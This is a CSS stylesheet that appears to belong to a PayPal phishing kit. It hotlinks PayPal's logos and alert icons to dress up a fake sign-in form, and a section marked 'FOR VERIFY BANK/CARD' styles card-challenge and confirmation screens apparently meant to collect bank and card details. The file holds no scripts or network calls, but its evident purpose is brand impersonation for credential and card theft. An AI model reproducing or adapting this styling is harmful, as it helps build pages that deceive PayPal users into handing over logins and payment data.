body{
    background-color: #fff;
    font-family: Arial, Helvetica, sans-serif;
}
a{
    color:rgb(55, 126, 207);
    text-decoration:none;
    font-weight: lighter;
}
a:hover{
    text-decoration: underline;
}
.form_container{
    width:350px;
    height:50%;
    border-style: double;
    border-width: 1px;
    border-color:rgb(235, 234, 234);
    border-radius: 5px;
    margin:auto;
    margin-top: 120px;
    padding:50px;
    padding-top:70px;
    background-image: url('https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg');
    background-repeat: no-repeat;
    background-position-x: center;
    background-position-y: 40px;
}
.input{
    width: 320px;
    padding: 15px 15px 15px 15px;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
    border-width: 1px;
    border-style: solid;
    text-align: left;
    font-size: 15px;
    border-color:rgb(172, 170, 170);
}
.cinput{
    width: 50px;
    padding: 15px 15px 15px 15px;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
    border-width: 1px;
    border-style: solid;
    text-align: left;
    font-size: 15px;
    border-color:rgb(172, 170, 170);
}
.err{
    background-image: url('https://www.paypalobjects.com/images/shared/icon_alert_sprite-2x.png');
    background-repeat: no-repeat;
    background-size: 20px;
    background-position: 12px -387px;
    background-position: left 12px top -387px;
    background-color: #fff7f7;
    padding: 15px 15px 15px 44px;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
    border-width: 1px;
    border-style: solid;
    text-align: left;
    font-size: 12px;
    border-color:#c72e2e;
}
.submit_btn{
    cursor: pointer;
    border-width:0px;
    background-color:#0070ba;
    color:#fff;
    text-align: center;
    font-weight: bolder;
    padding:auto;
    width:352px;
}
.submit_btn:hover{
    background-color: #005ea6;
}
.signup_btn{
    cursor: pointer;
    border-width:0px;
    background-color:#e1e7eb;
    color:#fff;
    text-align: center;
    font-weight: bolder;
    padding:auto;
}
.signup_btn:hover{
    background-color: #d2dbe1;
}
.or{
    position: absolute;
    background-color: #fff;
    margin:auto;
    margin-left:150px;
    margin-top:-15px;
    padding:10px;
    padding-top:5px;
}
.oro{
    position: absolute;
    background-color: #fff;
    margin:auto;
    margin-left:100px;
    margin-top:-15px;
    padding:10px;
    padding-top:5px;
}
.footer{
    position: absolute;
    bottom:0px;
    left:0px;
    right:0px;
    background-color:#f7f9fa;
    padding:10px;
    text-align: center;
    color:#979898;
    font-size:12px;
}







/* FOR VERIFY BANK/CARD */
.nxt_container{
    width:350px;
    height:50%;
    border:0px;
    margin:auto;
    margin-top: 10px;
    padding:50px;
    padding-top:70px;
}
.cn_container{
    width:350px;
    height:50%;
    border:0px;
    margin:auto;
    margin-top: 0px;
    padding:50px;
    padding-top:20px;
}
.done_container{
    height:50%;
    border:0px;
    margin:auto;
    text-align: center;
    margin-top: 0px;
    padding:50px;
    padding-top:70px;
}
.paypal-logo {
    margin: 0 auto;
    background: transparent url('https://www.paypalobjects.com/images/shared/monogram@2x.png') top no-repeat;
    -moz-background-size: 30px 37px;
    background-size: 30px 37px;
    width: 30px;
    height: 37px;
    display: block;
    text-indent: -999em;
}
.paypal-logo-done {
    margin: 0 auto;
    background: transparent url('https://media.tenor.com/images/cbae2dfd31aa5ec2fcb7f46b65e1550f/tenor.gif') top no-repeat;
    width: 200px;
    height: 270px;
    display: block;
    text-indent: -999em;
}
h1 {
    position: absolute;
    margin-bottom: 10px;
    font-family: pp-sans-big-light,Helvetica Neue,Arial,sans-serif;
    font-size: 2em;
    line-height: 33px;
}
.inconfirm{
    background-image: url("https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form.png");
    background-repeat: no-repeat;
    background-position: top -442.9px right 10px;
}
.nxt_btn{
    cursor: pointer;
    border-width:0px;
    background-color:#0070ba;
    color:#fff;
    text-align: center;
    font-weight: bolder;
    padding:auto;
    width:352px;
    border-radius:30px;
}
.nxt_btn:hover{
    background-color: #005ea6;
}
.cardChallenge .description {
    position: absolute;
    width: 80%;
    margin-left: auto;
    margin-right: auto;
    margin-top: 6px;
}
.description, .nextStep {
    font-family: pp-sans-small-light,Helvetica Neue,Arial,sans-serif;
    font-weight: 400;
    font-variant: normal;
    font-size: 1em;
    line-height: 1.5em;
    color: #2c2e2f;
}
#download_loader {
    width: 120px;
    height: 120px;
    background-image: url("flat-circle-spinner.svg");
    background-repeat: no-repeat;
    background-position: center center;
    display: block;
    margin: auto;
}
.downloaded {
    background-image: url("https://www.pngfuel.com/public/css/check-mark.svg") !important;
}